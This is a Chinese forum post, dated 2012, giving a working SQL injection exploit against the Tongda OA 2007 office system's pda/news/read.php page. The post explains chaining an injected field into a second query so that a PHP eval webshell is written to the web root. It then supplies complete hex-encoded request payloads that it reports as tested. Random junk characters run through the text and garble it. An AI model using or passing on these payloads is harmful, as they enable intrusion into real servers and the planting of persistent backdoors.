目前测试通达OA2007版本 i( s" w7 B8 S( s0 @* N/ |( }
: Y" u5 T* q' m3 H# W8 p ~
( b* w, K+ T9 W# }9 p5 i
Office Anywhere 2007 网络智能办公系统0 g9 b! I1 ?9 G
* x$ n8 [ U+ `6 x ^1 e9 P
http://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录.., s" y; y% f- u8 s; A
: g9 R2 c! k0 p7 ?% ]% g- C . K( _& v+ V+ w' E8 H
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
8 R, |3 s& _+ t/ Q& A
6 Z# F# \7 {& g" y# x例如:SELECT * from USER where USER_ID='{$USERNAME}' : ~/ A; a% u$ B5 J) s) U
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
0 V7 n5 Y2 D( L) G) f+ c. | + r' o8 G) h# j' H# w ~
这个时候我们是不是可以组合起来使用哪?/ S$ S( b& S# m9 y
0 Y V2 L/ ^! w2 r
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
; w5 T0 s* F' E* g3 H' H( wunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,103 b9 D" }; M) J
9 j6 b- R2 _9 N
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
/ o. H. r' y, s- |8 n& F
& Z3 N2 O' c1 g5 X那么问题来了,单引号可以吗?当然是不可以的,^_^。。。& Q$ d' Y# a3 d# ^5 B) N
N6 U: t1 M9 v
那么我们用字符串格式带入进行hex编码
. Q6 N _* _( J2 `) x % i6 l/ f! z1 H0 H9 N
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23# s, q# ]1 C7 A3 a4 i
j" E- b) ?/ ~1 A& }. e! h4 r测试ok,获取oa的webshell
6 R# t- b& g9 c$ [# S
; Y- W" ^" o. V1 ]: ]3 [ 9 _5 x$ T6 v5 |) y) d
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%235 A# l! ]- O0 |0 \- K: \
直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对